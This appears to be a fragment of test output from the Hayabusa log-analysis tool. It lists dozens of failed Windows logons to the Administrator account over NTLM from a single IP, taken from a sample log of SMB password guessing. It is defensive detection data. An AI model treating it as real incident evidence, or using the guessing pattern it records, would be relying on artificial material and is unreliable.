+2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSxTQ4HsZt2DeYVe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxHpSQwFSV4hveVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n3OwzSPomxZLoCe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e9IfwDZIfYT6A50K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOf6DbRX4zlNqLdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00kXrnJNH40NyoYL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nsNHcb9pnpdRgeL7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucMhgxMXy9Ch1jNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cfi3ZaLTECJgjM9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: usugjEEBHlhJvOyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQ1pM2CVLt5ITVD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NIboW7hNljF3HPpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOk5W4rkSYRRw4xS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJTfcwd8rnFc06iF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sm415W5zkvjdnTV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KEiSbtlmW4ou1mc7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xWeZV5pHt94adwUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5np7HeCPAFTDdTXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gXbe2jEJVtwaQXlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hZFiUCJnaBdHcw4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a71wyo41KV1ZoT7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogB17WdeOiC19rqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ANOLPWG12lkW39Ei | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y1vf7OUxb6TH3Q4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxU5yumSieUzSgzH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9K5EoWWASU8SlSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PwZLRPFxaFWwjZEe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8fXgFFb3HTMunsoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R1RozAr1uhux4cYW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7EmuUSv03RnhKsF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jw410HEW8EC3MC9f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTYp8cEbt3Yggo3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWJVzgYLWIo7SGCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DP13jPdW5Gdl8z56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LNXOWjHmMDhfFVon | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kka1RiF3f7Nhkf8x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2o90lG6attzWU4ZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PyPK9kuJdflQ4RKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a9I3El7d7anR0kIz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDUMTEfNhFuuqMle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e0F70d1WstkqnQgA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bm0txApQSp1U42N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JeEe5ENSIZnfc3FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oasE54Z1FlpswY0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhje1BgvxOlG28JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9iTIv4UQ4En9RA2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mg8KFm1lCeImj8Sb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h17Fz1s6GJki61jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Pjjn4FAkJn4h32r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARVx3FAAww8Gmfvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sYIwPg5k1wpvWobN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0sfhYQ54SjC4JTX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nfZYnUPV40FShcqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XYbvWVCT0tFixZTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XC6Vmz0ql8myDuGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJ8JvuvZZzwSOzFo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s06yKaogI6FYkXla | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCjOc7PguxwNKoQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BX5IosnpdYZK5xZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfMjB1epEm64wVEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb4FVO2SKsoMyt1K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1qoRw2jjFx4F6Wx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ImiLeiteLoSw32I0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcIYD47BIEP8gB0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lUAeB15aWamcaZ8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFOKiSDWc1dWjzge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hqyMtzjKSJEtEAdx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtHsItpyFHQxvLWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RdGMqIhUGHj23Xm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfE5LVmrPaAFLwBR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1swKSla5gkdOwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kL9MdVnRVogiP7hF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aQ0hRdwZvC5PBcXl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ctbv73J0Dot9raD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
